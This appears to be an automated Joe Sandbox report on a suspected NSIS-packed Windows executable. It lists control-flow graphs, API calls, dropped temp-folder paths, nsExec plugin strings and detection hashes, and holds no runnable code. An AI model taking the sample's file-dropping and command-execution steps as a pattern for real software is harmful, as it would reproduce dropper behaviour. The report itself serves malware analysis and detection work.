                          control_flow_graph 308 403a96-403aae call 4066b5 311 403ab0-403ac0 call 4061eb 308->311 312 403ac2-403af3 call 406174 308->312 321 403b16-403b3f call 403d5b call 405d0d 311->321 317 403af5-403b06 call 406174 312->317 318 403b0b-403b11 lstrcatA 312->318 317->318 318->321 326 403b45-403b4a 321->326 327 403bc6-403bce call 405d0d 321->327 326->327 328 403b4c-403b64 call 406174 326->328 333 403bd0-403bd7 call 406320 327->333 334 403bdc-403c01 LoadImageA 327->334 332 403b69-403b70 328->332 332->327 335 403b72-403b74 332->335 333->334 337 403c82-403c8a call 40140b 334->337 338 403c03-403c33 RegisterClassA 334->338 339 403b85-403b91 lstrlenA 335->339 340 403b76-403b83 call 405c4a 335->340 349 403c94-403c9f call 403d5b 337->349 350 403c8c-403c8f 337->350 341 403d51 338->341 342 403c39-403c7d SystemParametersInfoA CreateWindowExA 338->342 347 403b93-403ba1 lstrcmpiA 339->347 348 403bb9-403bc1 call 405c1f call 40628d 339->348 340->339 346 403d53-403d5a 341->346 342->337 347->348 353 403ba3-403bad GetFileAttributesA 347->353 348->327 361 403ca5-403cbf ShowWindow call 406647 349->361 362 403d28-403d29 call 4054a3 349->362 350->346 356 403bb3-403bb4 call 405c66 353->356 357 403baf-403bb1 353->357 356->348 357->348 357->356 369 403cc1-403cc6 call 406647 361->369 370 403ccb-403cdd GetClassInfoA 361->370 365 403d2e-403d30 362->365 367 403d32-403d38 365->367 368 403d4a-403d4c call 40140b 365->368 367->350 371 403d3e-403d45 call 40140b 367->371 368->341 369->370 374 403cf5-403d18 DialogBoxParamA call 40140b 370->374 375 403cdf-403cef GetClassInfoA RegisterClassA 370->375 371->350 379 403d1d-403d26 call 4039e6 374->379 375->374 379->346
                          APIs
                            • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                            • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                          • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,77193410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",0000000A,0000000C), ref: 00403B11
                          • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,77193410), ref: 00403B86
                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                          • GetFileAttributesA.KERNEL32(Remove folder: ,?,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",0000000A,0000000C), ref: 00403BA4
                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth), ref: 00403BED
                            • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                          • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                          • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\vfhlZ0vrbe.exe",0000000A,0000000C), ref: 00403CAD
                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                          • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                          • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                          • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\user\Desktop\vfhlZ0vrbe.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                          • API String ID: 1975747703-3813020735
                          • Opcode ID: 79260377285cc82dbbfc7a510320d5572e35410a0c0bc4c8fa40152996274480
                          • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                          • Opcode Fuzzy Hash: 79260377285cc82dbbfc7a510320d5572e35410a0c0bc4c8fa40152996274480
                          • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D
                          Function 00402F31 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 382 402f31-402f7f GetTickCount GetModuleFileNameA call 405e20 385 402f81-402f86 382->385 386 402f8b-402fb9 call 40628d call 405c66 call 40628d GetFileSize 382->386 387 403161-403165 385->387 394 4030a4-4030b2 call 402ecd 386->394 395 402fbf 386->395 402 4030b4-4030b7 394->402 403 403107-40310c 394->403 396 402fc4-402fdb 395->396 398 402fdd 396->398 399 402fdf-402fe8 call 40337a 396->399 398->399 408 40310e-403116 call 402ecd 399->408 409 402fee-402ff5 399->409 404 4030b9-4030d1 call 403390 call 40337a 402->404 405 4030db-403105 GlobalAlloc call 403390 call 403168 402->405 403->387 404->403 428 4030d3-4030d9 404->428 405->403 433 403118-403129 405->433 408->403 412 403071-403075 409->412 413 402ff7-40300b call 405ddb 409->413 417 403077-40307e call 402ecd 412->417 418 40307f-403085 412->418 413->418 431 40300d-403014 413->431 417->418 424 403094-40309c 418->424 425 403087-403091 call 40676c 418->425 424->396 432 4030a2 424->432 425->424 428->403 428->405 431->418 437 403016-40301d 431->437 432->394 434 403131-403136 433->434 435 40312b 433->435 438 403137-40313d 434->438 435->434 437->418 439 40301f-403026 437->439 438->438 440 40313f-40315a SetFilePointer call 405ddb 438->440 439->418 441 403028-40302f 439->441 444 40315f 440->444 441->418 443 403031-403051 441->443 443->403 445 403057-40305b 443->445 444->387 446 403063-40306b 445->446 447 40305d-403061 445->447 446->418 448 40306d-40306f 446->448 447->432 447->446 448->418
                          APIs
                          • GetTickCount.KERNEL32 ref: 00402F42
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\vfhlZ0vrbe.exe,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                            • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                            • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\vfhlZ0vrbe.exe,C:\Users\user\Desktop\vfhlZ0vrbe.exe,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                          • GlobalAlloc.KERNELBASE(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\user\Desktop\vfhlZ0vrbe.exe"$8TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\vfhlZ0vrbe.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                          • API String ID: 2803837635-1351363330
                          • Opcode ID: f49f85fbe7888e3b10c39431673b010741fca75b5d582ad2466d93653721041e
                          • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                          • Opcode Fuzzy Hash: f49f85fbe7888e3b10c39431673b010741fca75b5d582ad2466d93653721041e
                          • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D
                          Function 00406320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 208stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 449 406320-40632b 450 40632d-40633c 449->450 451 40633e-406353 449->451 450->451 452 406564-406568 451->452 453 406359-406364 451->453 454 406376-406380 452->454 455 40656e-406578 452->455 453->452 456 40636a-406371 453->456 454->455 459 406386-40638d 454->459 457 406583-406584 455->457 458 40657a-40657e call 40628d 455->458 456->452 458->457 461 406393-4063c9 459->461 462 406557 459->462 465 406501-406504 461->465 466 4063cf-4063d9 461->466 463 406561-406563 462->463 464 406559-40655f 462->464 463->452 464->452 467 406534-406537 465->467 468 406506-406509 465->468 469 4063f6 466->469 470 4063db-4063e4 466->470 474 406545-406555 lstrlenA 467->474 475 406539-406540 call 406320 467->475 472 406519-406525 call 40628d 468->472 473 40650b-406517 call 4061eb 468->473 471 4063fd-406405 469->471 470->469 476 4063e6-4063e9 470->476 477 406407 471->477 478 40640e-406410 471->478 487 40652a-406530 472->487 473->487 474->452 475->474 476->469 482 4063eb-4063ee 476->482 477->478 484 406412-40642d call 406174 478->484 485 406447-40644a 478->485 482->469 483 4063f0-4063f4 482->483 483->471 492 406432-406435 484->492 490 40644c-406458 GetSystemDirectoryA 485->490 491 40645d-406460 485->491 487->474 489 406532 487->489 493 4064f9-4064ff call 406587 489->493 494 4064e3-4064e6 490->494 495 406471-406474 491->495 496 406462-40646e GetWindowsDirectoryA 491->496 499 4064e8-4064ec 492->499 500 40643b-406442 call 406320 492->500 493->474 494->493 494->499 495->494 498 406476-406494 495->498 496->495 502 406496-406499 498->502 503 4064ab-4064b7 call 4066b5 498->503 499->493 505 4064ee-4064f4 lstrcatA 499->505 500->494 502->503 506 40649b-40649f 502->506 511 4064bf-4064c3 503->511 505->493 510 4064a7-4064a9 506->510 510->494 510->503 512 4064c5-4064d8 SHGetPathFromIDListA CoTaskMemFree 511->512 513 4064da-4064e1 511->513 512->494 512->513 513->494 513->498
                          APIs
                          • GetSystemDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00406452
                          • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00000000), ref: 00406468
                          • SHGetPathFromIDListA.SHELL32(00000000,Remove folder: ,?,T@,00000007,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000), ref: 004064C7
                          • CoTaskMemFree.OLE32(00000000,?,T@,00000007,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000), ref: 004064D0
                          • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000), ref: 004064F4
                          • lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00405409,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00000000,00422E40,771923A0), ref: 00406546
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                          • String ID: T@$Bry gek$$Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 4024019347-2750152971
                          • Opcode ID: 528d0d34f11662d8c7703c4154d98a0add83743daff245b27c466bc1c92f2fac
                          • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                          • Opcode Fuzzy Hash: 528d0d34f11662d8c7703c4154d98a0add83743daff245b27c466bc1c92f2fac
                          • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D
                          Function 0040177E Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 583 40177e-4017a1 call 402c5e call 405c8c 588 4017a3-4017a9 call 40628d 583->588 589 4017ab-4017bd call 40628d call 405c1f lstrcatA 583->589 595 4017c2-4017c8 call 406587 588->595 589->595 599 4017cd-4017d1 595->599 600 4017d3-4017dd call 406620 599->600 601 401804-401807 599->601 609 4017ef-401801 600->609 610 4017df-4017ed CompareFileTime 600->610 603 401809-40180a call 405dfb 601->603 604 40180f-40182b call 405e20 601->604 603->604 611 4018a3-4018cc call 4053d1 call 403168 604->611 612 40182d-401830 604->612 609->601 610->609 626 4018d4-4018e0 SetFileTime 611->626 627 4018ce-4018d2 611->627 613 401832-401874 call 40628d * 2 call 406320 call 40628d call 4059a3 612->613 614 401885-40188f call 4053d1 612->614 613->599 647 40187a-40187b 613->647 624 401898-40189e 614->624 628 402af3 624->628 630 4018e6-4018f1 CloseHandle 626->630 627->626 627->630 631 402af5-402af9 628->631 633 4018f7-4018fa 630->633 634 402aea-402aed 630->634 636 4018fc-40190d call 406320 lstrcatA 633->636 637 40190f-401912 call 406320 633->637 634->628 642 401917-4023b9 call 4059a3 636->642 637->642 642->631 642->634 647->624 649 40187d-40187e 647->649 649->614
                          APIs
                          • lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene,00000000,00000000,00000031), ref: 004017BD
                          • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene,00000000,00000000,00000031), ref: 004017E7
                            • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,Swindlery Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                            • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0), ref: 0040542D
                            • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\), ref: 0040543F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: Bry gek$$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene$C:\Users\user\AppData\Local\Temp\nsw42F9.tmp$C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dll$ExecToStack
                          • API String ID: 1941528284-2530868756
                          • Opcode ID: 908cdde23a37c59eed602190bf861c7c438ddb75d702381ffc149047ffda4333
                          • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                          • Opcode Fuzzy Hash: 908cdde23a37c59eed602190bf861c7c438ddb75d702381ffc149047ffda4333
                          • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD
                          Function 004053D1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 650 4053d1-4053e6 651 40549c-4054a0 650->651 652 4053ec-4053fe 650->652 653 405400-405404 call 406320 652->653 654 405409-405415 lstrlenA 652->654 653->654 656 405432-405436 654->656 657 405417-405427 lstrlenA 654->657 658 405445-405449 656->658 659 405438-40543f SetWindowTextA 656->659 657->651 660 405429-40542d lstrcatA 657->660 661 40544b-40548d SendMessageA * 3 658->661 662 40548f-405491 658->662 659->658 660->656 661->662 662->651 663 405493-405496 662->663 663->651
                          APIs
                          • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                          • lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                          • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0), ref: 0040542D
                          • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\), ref: 0040543F
                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\
                          • API String ID: 2531174081-3568339937
                          • Opcode ID: ebdbd1b6f4dce09f55bb89e7b78eef38760fa4045934dab0d298cb41f38885f9
                          • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                          • Opcode Fuzzy Hash: ebdbd1b6f4dce09f55bb89e7b78eef38760fa4045934dab0d298cb41f38885f9
                          • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8
                          Function 00403168 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 664 403168-40317c 665 403185-40318e 664->665 666 40317e 664->666 667 403190 665->667 668 403197-40319c 665->668 666->665 667->668 669 4031ac-4031b9 call 40337a 668->669 670 40319e-4031a7 call 403390 668->670 674 403368 669->674 675 4031bf-4031c3 669->675 670->669 676 40336a-40336b 674->676 677 403313-403315 675->677 678 4031c9-403212 GetTickCount 675->678 681 403373-403377 676->681 679 403355-403358 677->679 680 403317-40331a 677->680 682 403370 678->682 683 403218-403220 678->683 686 40335a 679->686 687 40335d-403366 call 40337a 679->687 680->682 688 40331c 680->688 682->681 684 403222 683->684 685 403225-403233 call 40337a 683->685 684->685 685->674 697 403239-403242 685->697 686->687 687->674 698 40336d 687->698 691 40331f-403325 688->691 694 403327 691->694 695 403329-403337 call 40337a 691->695 694->695 695->674 701 403339-403345 call 405ec7 695->701 700 403248-403268 call 4067da 697->700 698->682 706 40330b-40330d 700->706 707 40326e-403281 GetTickCount 700->707 708 403347-403351 701->708 709 40330f-403311 701->709 706->676 710 403283-40328b 707->710 711 4032c6-4032c8 707->711 708->691 712 403353 708->712 709->676 713 403293-4032be MulDiv wsprintfA call 4053d1 710->713 714 40328d-403291 710->714 715 4032ca-4032ce 711->715 716 4032ff-403303 711->716 712->682 723 4032c3 713->723 714->711 714->713 717 4032d0-4032d7 call 405ec7 715->717 718 4032e5-4032f0 715->718 716->683 719 403309 716->719 724 4032dc-4032de 717->724 722 4032f3-4032f7 718->722 719->682 722->700 725 4032fd 722->725 723->711 724->709 726 4032e0-4032e3 724->726 725->682 726->722
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CountTick$wsprintf
                          • String ID: %A$... %d%%$@.B
                          • API String ID: 551687249-2309215229
                          • Opcode ID: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                          • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                          • Opcode Fuzzy Hash: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                          • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9
                          Function 00406647 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 727 406647-406667 GetSystemDirectoryA 728 406669 727->728 729 40666b-40666d 727->729 728->729 730 40667d-40667f 729->730 731 40666f-406677 729->731 733 406680-4066b2 wsprintfA LoadLibraryExA 730->733 731->730 732 406679-40667b 731->732 732->733
                          APIs
                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                          • wsprintfA.USER32 ref: 00406697
                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
